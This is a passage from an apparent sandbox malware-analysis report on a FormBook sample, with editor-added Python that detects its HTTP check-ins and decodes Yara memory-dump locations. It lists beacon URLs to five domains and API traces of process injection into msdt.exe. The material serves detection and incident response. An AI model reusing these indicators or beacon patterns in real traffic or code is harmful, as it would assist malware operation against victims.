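The five requests above are the sample's check-ins: one /fqiq/ path, two query parameters, Connection: close, and a GET that still carries seven NUL bytes of body, sent in turn to five unrelated domains. The vendor URLs in the preceding "String found in binary or memory" rows (founder.com.cn, jiyu-kobo.co.jp, sajatypeworks.com and the others) look like the licensing strings Windows system fonts carry in their name tables rather than network indicators; that is this editor's reading, not a finding of the report. The Python below is an added example, not Joe Sandbox's or FormBook's code. It rebuilds the five logged requests as raw HTTP (constructed input, copied from the rows above) and clusters check-in-shaped requests by path, keeping paths that recur across several hosts with one query parameter held constant. The path regex and the min_hosts threshold are assumptions chosen for this sample.

```python
"""Flag FormBook-style HTTP check-ins in captured requests.

Added example for this report; not Joe Sandbox's or FormBook's code.
Traits that set these check-ins apart from ordinary web traffic:
  * a GET that nevertheless carries a small body made only of NUL bytes
  * a short path of the form /xxxx/ with exactly two query parameters
  * one parameter constant across every host (here z0DH=f0Dtar1PYnAdDzS)
  * the same path reused against several unrelated domains
The path-length bound and min_hosts are this editor's assumptions.
"""
from __future__ import annotations
import re
from collections import defaultdict
from dataclasses import dataclass

# Request targets and Host headers copied from the report's HTTP rows.
OBSERVED = [
    ("/fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=MhZqZeIh1bEx9EPhBOs++VNt6zdxCxYLlsX+VD+R30361cyojbkVOC5VQe1OoxOfJLYr", "www.ribbonofficial.com"),
    ("/fqiq/?ZvEd=prTEVkQtidVRbelnknUsCYHPcHrUQSHWronmvObfBYwGPcpLSCQwPhh2tosJT24FW2ZT&z0DH=f0Dtar1PYnAdDzS", "www.sanlifalan.com"),
    ("/fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=cd5R1bQkGt60ucaw3I3E0k/wUnqrUWXrQueIKe7m3jIZGD6slZfTAntz2qvR4Gb0BO+l", "www.floaterslaser.com"),
    ("/fqiq/?ZvEd=oM7C4s4K9Ux9NUwG97tedYlymorHgm5Kv3Umj1Gnv/i5ubiDMWU/+XDfdu3U3Pyuil7R&z0DH=f0Dtar1PYnAdDzS", "www.mambacustomboats.com"),
    ("/fqiq/?ZvEd=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8My9QnEOoaqj&z0DH=f0Dtar1PYnAdDzS", "www.esyscoloradosprings.com"),
]


def build_raw(target: str, host: str, body: bytes = b"\x00" * 7) -> bytes:
    """Constructed wire form of one logged request: GET, Connection: close, 7 NUL bytes."""
    head = f"GET {target} HTTP/1.1\r\nHost: {host}\r\nConnection: close\r\n\r\n"
    return head.encode("ascii") + body


@dataclass(frozen=True)
class Request:
    method: str
    path: str
    params: tuple[tuple[str, str], ...]   # raw (key, value) pairs, order kept, no decoding
    host: str
    body: bytes


def parse_request(raw: bytes) -> Request:
    """Minimal HTTP/1.x parser: request line, headers, then whatever follows the blank line."""
    head, _, body = raw.partition(b"\r\n\r\n")
    lines = head.decode("ascii", errors="replace").split("\r\n")
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    path, _, query = target.partition("?")
    params = []
    for pair in query.split("&"):
        if pair:
            key, _, value = pair.partition("=")
            params.append((key, value))
    return Request(method, path, tuple(params), headers.get("host", ""), body)


SHORT_PATH = re.compile(r"^/[A-Za-z0-9]{2,8}/$")   # e.g. /fqiq/ (assumed bound)


def request_flags(req: Request) -> list[str]:
    """Per-request traits. Any one alone is weak evidence; all three together are not."""
    flags = []
    if req.method == "GET" and req.body and set(req.body) == {0}:
        flags.append("get_with_nul_body")   # a GET should carry no body at all
    if SHORT_PATH.match(req.path):
        flags.append("short_path")
    if len(req.params) == 2:
        flags.append("two_params")
    return flags


def find_beacon_clusters(raws: list[bytes], min_hosts: int = 3) -> list[dict]:
    """Group check-in-shaped requests by path and keep paths that recur across
    >= min_hosts domains with at least one (key, value) pair constant throughout."""
    by_path: dict[str, list[Request]] = defaultdict(list)
    for raw in raws:
        req = parse_request(raw)
        if len(request_flags(req)) == 3:
            by_path[req.path].append(req)
    clusters = []
    for path, reqs in by_path.items():
        hosts = sorted({r.host for r in reqs})
        if len(hosts) < min_hosts:
            continue
        constant = set.intersection(*(set(r.params) for r in reqs))
        if not constant:
            continue   # nothing stays fixed across hosts: probably unrelated traffic
        clusters.append({"path": path, "hosts": hosts, "requests": len(reqs),
                         "constant_params": sorted(constant)})
    return clusters


if __name__ == "__main__":
    for cluster in find_beacon_clusters([build_raw(t, h) for t, h in OBSERVED]):
        print(cluster)
```

Run as a script it prints the single /fqiq/ cluster with all five hosts and z0DH=f0Dtar1PYnAdDzS as the constant parameter. In a proxy or PCAP pipeline the same find_beacon_clusters call takes the reassembled request bytes. The report does not say what z0DH encodes, so the code treats it only as a string that stays fixed while the second parameter changes per request.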

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match | File source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match | File source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match | File source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match | File source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
          Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
          Both rules matched each of the following sources:
          Source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPE
          Source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPE
          Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORY
          Source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
          Source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
          Source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
          Source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORY
          Source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
          Source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORY
          Source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORY
          Source: divpCHa0h7.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Matched rule: Formbook_1 | date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Matched rule: Formbook | author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Both rules matched each of the following sources:
          Source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPE
          Source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPE
          Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORY
          Source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
          Source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
          Source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
          Source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORY
          Source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
          Source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORY
          Source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORY
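The dump names in the Yara rows encode where in each process the payload was found, which is the detail a responder wants from this section: the re-launched copy of the sample (pid 5) carries FormBook at its 0x400000 image base, while msdt.exe (pid 15) holds it in PAGE_EXECUTE_READWRITE memory at 0x02660000 and 0x02760000. The Python below is an added example, not Joe Sandbox code: it parses both source forms that appear above and summarises per process. The field meanings are this editor's reading of the naming scheme (the pid field checks out against the 5_2_ and 15_2_ prefixes on the code-function rows, the protection field against the winnt.h PAGE_* values); the last field of an .sdmp name is left undecoded, and pid 6 is left unnamed because this section never names that process. The YARA_SOURCES list is copied from the rows above.

```python
"""Decode the memory-dump names that the Yara hits point at.

Added example for this report, not Joe Sandbox code. A source such as
  0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp
is read as: process id (hex; 0F = 15, the msdt.exe pid of the "15_2_"
code-function rows), analysis phase, dump sequence number, region base
address, page protection (Windows PAGE_* values) and a final flag the
report does not explain, which is kept raw. The form
  N.M.<image>.<base>.<n>[.raw].unpack
is an unpacked PE from pid N at that base. All of this is the editor's
reading of the naming scheme, not documented behaviour.
"""
import re
from collections import defaultdict
from dataclasses import dataclass
from typing import Optional

# Copied from the "Yara detected FormBook" rows of the report.
YARA_SOURCES = [
    "5.2.divpCHa0h7.exe.400000.0.unpack",
    "1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack",
    "5.1.divpCHa0h7.exe.400000.0.unpack",
    "5.1.divpCHa0h7.exe.400000.0.raw.unpack",
    "5.2.divpCHa0h7.exe.400000.0.raw.unpack",
    "1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack",
    "0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp",
    "00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp",
    "00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp",
    "00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp",
    "00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp",
    "00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp",
    "0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp",
    "00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp",
    "0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp",
    "00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp",
]
# Pids the report itself ties to an image (the N_2_ prefixes of the code-function rows).
PROCESS_NAMES = {1: "divpCHa0h7.exe", 5: "divpCHa0h7.exe", 15: "msdt.exe"}
IMAGE_BASE = 0x400000   # default load address of a 32-bit EXE, where 5.x.divpCHa0h7.exe.400000 sits

PAGE_PROTECTION = {   # winnt.h memory protection constants
    0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY",
}
HEX8 = r"([0-9A-Fa-f]{8})"
SDMP_RE = re.compile(rf"^{HEX8}\.{HEX8}\.(\d+)\.([0-9A-Fa-f]{{16}})\.{HEX8}\.{HEX8}\.sdmp$")
UNPACK_RE = re.compile(r"^(\d+)\.(\d+)\.(.+?)\.([0-9A-Fa-f]+)\.(\d+)(?:\.raw)?\.unpack$")


@dataclass(frozen=True)
class DumpRef:
    pid: int
    phase: int
    base: int
    protection: Optional[int]   # None for .unpack artefacts (not encoded in the name)
    kind: str                   # "memory" or "unpacked_pe"


def parse_source(name: str) -> DumpRef:
    """Turn one Yara source name into its process, base address and protection."""
    m = SDMP_RE.match(name)
    if m:
        pid, phase, _seq, base, prot, _flag = m.groups()
        return DumpRef(int(pid, 16), int(phase, 16), int(base, 16), int(prot, 16), "memory")
    m = UNPACK_RE.match(name)
    if m:
        pid, phase, _image, base, _index = m.groups()
        return DumpRef(int(pid), int(phase), int(base, 16), None, "unpacked_pe")
    raise ValueError(f"unrecognised source name: {name}")


def summarize(sources):
    """Per process: image name, whether the payload sits at the EXE image base
    (what a hollowed process looks like), and the extra RWX regions holding it."""
    per_pid = defaultdict(list)
    for name in sources:
        ref = parse_source(name)
        per_pid[ref.pid].append(ref)
    report = {}
    for pid, refs in sorted(per_pid.items()):
        mem = [r for r in refs if r.kind == "memory"]
        report[pid] = {
            "process": PROCESS_NAMES.get(pid, "unknown"),
            "payload_at_image_base": any(r.base == IMAGE_BASE for r in refs),
            "rwx_regions": sorted({r.base for r in mem
                                   if r.protection == 0x40 and r.base != IMAGE_BASE}),
            "protections": sorted({PAGE_PROTECTION.get(r.protection, hex(r.protection))
                                   for r in mem}),
        }
    return report


if __name__ == "__main__":
    for pid, info in summarize(YARA_SOURCES).items():
        print(pid, info["process"], [hex(b) for b in info["rwx_regions"]], info["protections"])
```

The per-pid summary is what to carry into host triage: for msdt.exe the two private RWX regions are the dump addresses to pull, and for pid 5 the hit at 0x400000 in the phase-1 dump (taken at process start) is what a hollowed copy of the sample looks like before any of its own code has run.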
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 1_2_0106D064
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 1_2_0106F296
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 1_2_0106F298
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 1_2_04F90D51
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 1_2_04F95A10
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_0040102D
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00401030
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_0041B8D3
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_0041B8D6
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_0041C98B
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_0041C343
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00408C8B
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00408C90
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00402D8C
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00402D90
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00402FB0
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F2B090
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00FD1002
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F34120
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F1F900
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F4EBB0
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F2841F
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F2D5E0
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00FE1D55
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F10D20
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AF20A0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04ADB090
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AD841F
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B81002
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AF2581
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04ADD5E0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AC0D20
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AE4120
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04ACF900
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B91D55
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AE6E30
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04AFEBB0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_0277C343
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_0277B8D6
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_0277B8D3
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_0277C98B
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_02762FB0
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_02768C90
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_02768C8B
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_02762D90
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_02762D8C
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: String function: 04ACB150 appears 35 times
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: String function: 00F1B150 appears 31 times
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_004185F0 NtCreateFile,
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_004186A0 NtReadFile,
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00418720 NtClose,
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_004187D0 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_004185EB NtCreateFile,
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_0041871A NtClose,
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_004187CA NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F598F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F59860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F59840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F59910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F59A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F59A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F59A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F595D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F59540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F59660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F59FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F597A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F59780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F59710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F598A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F5B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F59820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F599D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F59950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F59A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F59A10 NtQuerySection,
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F5A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F59B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F595F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F59560 NtWriteFile,
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F5AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F59520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\divpCHa0h7.exe | Code function: 5_2_00F596D0 NtCreateKey,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B09860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B09840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B095D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B09910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B09540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B096E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B096D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B09660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B09650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B09A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B09780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B09FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B09710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B098A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B098F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B09820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B0B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B095F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B099D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\msdt.exe | Code function: 15_2_04B0AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09560 NtWriteFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B0A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B097A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B0A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B0A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_04B09760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_027786A0 NtReadFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_02778720 NtClose,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_027787D0 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_027785F0 NtCreateFile,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_0277871A NtClose,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_027787CA NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\msdt.exeCode function: 15_2_027785EB NtCreateFile,
          Source: divpCHa0h7.exeBinary or memory string: OriginalFilename vs divpCHa0h7.exe
          Source: divpCHa0h7.exe, 00000001.00000000.243614905.0000000000692000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDateTimeFormatFla.exe6 vs divpCHa0h7.exe
          Source: divpCHa0h7.exe, 00000001.00000002.271111819.00000000071F0000.00000004.00020000.sdmpBinary or memory string: OriginalFilenameUI.dll< vs divpCHa0h7.exe
          Source: divpCHa0h7.exe, 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmpBinary or memory string: l,\\StringFileInfo\\000004B0\\OriginalFilename vs divpCHa0h7.exe
          Source: divpCHa0h7.exeBinary or memory string: OriginalFilename vs divpCHa0h7.exe
          Source: divpCHa0h7.exe, 00000003.00000000.261988052.0000000000142000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDateTimeFormatFla.exe6 vs divpCHa0h7.exe
          Source: divpCHa0h7.exeBinary or memory string: OriginalFilename vs divpCHa0h7.exe
          Source: divpCHa0h7.exe, 00000004.00000000.263958502.00000000003A2000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameDateTimeFormatFla.exe6 vs divpCHa0h7.exe
